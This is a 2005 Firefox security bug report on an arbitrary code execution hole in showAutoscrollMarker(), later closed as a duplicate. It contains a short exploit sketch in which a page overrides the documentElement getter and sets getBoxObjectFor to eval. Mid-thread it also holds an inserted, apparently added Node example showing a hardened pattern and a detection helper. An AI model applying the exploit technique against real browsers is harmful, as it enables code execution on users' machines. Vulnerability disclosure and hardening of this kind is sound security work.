Closed Bug 289079 Opened 19 years ago Closed 19 years ago

security hole in showAutoscrollMarker()

Categories

Product/Component: Firefox :: Security
Hardware: x86
OS: Windows XP
Type: defect
Priority: Not set
Severity: normal

Tracking


RESOLVED DUPLICATE of bug 289074

People

(Reporter: moz_bug_r_a4, Assigned: caillon)

References

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2

Vulnerability: arbitrary code execution

Vulnerable code:
from browser.xml

<method name="showAutoscrollMarker">
  <parameter name="evt"/>
  <body>
    <![CDATA[
      var scrollCursor  = new Array("move", "n-resize", "e-resize");
      var docBox = this._clientFrameDoc.getBoxObjectFor(this._clientFrameDoc.documentElement);


Exploit:
Web pages can overwrite the getter of documentElement and the getBoxObjectFor
method, for example as follows:

  document.__defineGetter__("documentElement", function() {
    return MALICIOUS_CODE;
  });
  document.getBoxObjectFor = eval;

An attacker can exploit *without* user interaction.


I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404 Firefox/1.0+


Reproducible: Always

Steps to Reproduce:
Attached file testcase
Status: UNCONFIRMED → NEW
Ever confirmed: true
Blocks: sbb?
Flags: blocking-aviary1.0.3?
Blocks: 289187
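The pattern in the report is privileged code dispatching a property read and a method call through an object the page controls. The following is an added example, not code from this bug or from Firefox: a Node toy that models the vulnerable shape of showAutoscrollMarker beside a hardened form that captures the trusted accessors from the prototype at load time, plus a small detection helper that reports instance properties shadowing prototype members. The class name Document, the functions vulnerableGetDocBox, hardenedGetDocBox, detectShadowedMembers, simulatePageScript and demo, and the placeholder string 'ATTACKER_STRING' are all constructed for the example; the replaced method records its argument in an array instead of evaluating it, since Node has no chrome/content privilege boundary to demonstrate.

```javascript
// Added example, not code from the bug or from Firefox. Node has no
// chrome/content privilege boundary, so "the sink" is just an array that
// records what the replaced method received; nothing is evaluated.

// Constructed stand-in for the trusted document prototype, as the browser
// defines it before any page script runs (hypothetical toy class).
class Document {
  constructor() { this._root = { tagName: 'html' }; }
  get documentElement() { return this._root; }
  getBoxObjectFor(el) { return { element: el, width: 800, height: 600 }; }
}

// Vulnerable shape, as in showAutoscrollMarker: both the property read and
// the method call dispatch through the untrusted object, so a content-defined
// getter and a replaced method run instead of the trusted ones.
function vulnerableGetDocBox(clientFrameDoc) {
  return clientFrameDoc.getBoxObjectFor(clientFrameDoc.documentElement);
}

// Hardened shape: capture the trusted accessor and method from the prototype
// once, at load time, and apply them to the object directly. Own-property
// overrides on the instance are then never consulted. This only protects
// against tampering that happens after the capture, so it must run before
// untrusted code can; in a browser the chrome/content realm split provides
// that ordering.
const trustedDocumentElement =
  Object.getOwnPropertyDescriptor(Document.prototype, 'documentElement').get;
const trustedGetBoxObjectFor = Document.prototype.getBoxObjectFor;

function hardenedGetDocBox(clientFrameDoc) {
  if (!(clientFrameDoc instanceof Document)) {
    throw new TypeError('expected a Document');
  }
  const root = Reflect.apply(trustedDocumentElement, clientFrameDoc, []);
  return Reflect.apply(trustedGetBoxObjectFor, clientFrameDoc, [root]);
}

// Detection helper: reports prototype members that an instance has shadowed
// with its own property, which is exactly what the override in the report
// leaves behind.
function detectShadowedMembers(doc, names) {
  const proto = Object.getPrototypeOf(doc);
  return names.filter(
    (n) => Object.prototype.hasOwnProperty.call(doc, n) && n in proto
  );
}

// Simulated page script. The getter returns a constructed placeholder string
// and the replaced method records its argument in `trace` instead of
// evaluating it.
function simulatePageScript(doc, trace) {
  Object.defineProperty(doc, 'documentElement', {
    configurable: true,
    get() { return 'ATTACKER_STRING'; },
  });
  doc.getBoxObjectFor = (arg) => { trace.push(arg); return null; };
}

// Runs one path against a document the page script has already tampered with.
function demo(useHardened) {
  const doc = new Document();
  const trace = [];
  simulatePageScript(doc, trace);
  const box = useHardened ? hardenedGetDocBox(doc) : vulnerableGetDocBox(doc);
  const shadowed = detectShadowedMembers(
    doc, ['documentElement', 'getBoxObjectFor', 'nodeType']);
  return { trace, box, shadowed };
}

console.log('vulnerable:', demo(false));
console.log('hardened:', demo(true));
```

With the vulnerable path the page-supplied string reaches the replaced method; with the hardened path the trusted getter and method run and the page's overrides are never called. The detection helper flags both shadowed members, which is a cheap sanity check privileged code can run on an object it received from content before trusting it.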
Taking this one.
Assignee: dveditz → caillon
Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 289074]
Flags: blocking-aviary1.0.3?
Group: security
Blocks: sbb+
No longer blocks: sbb?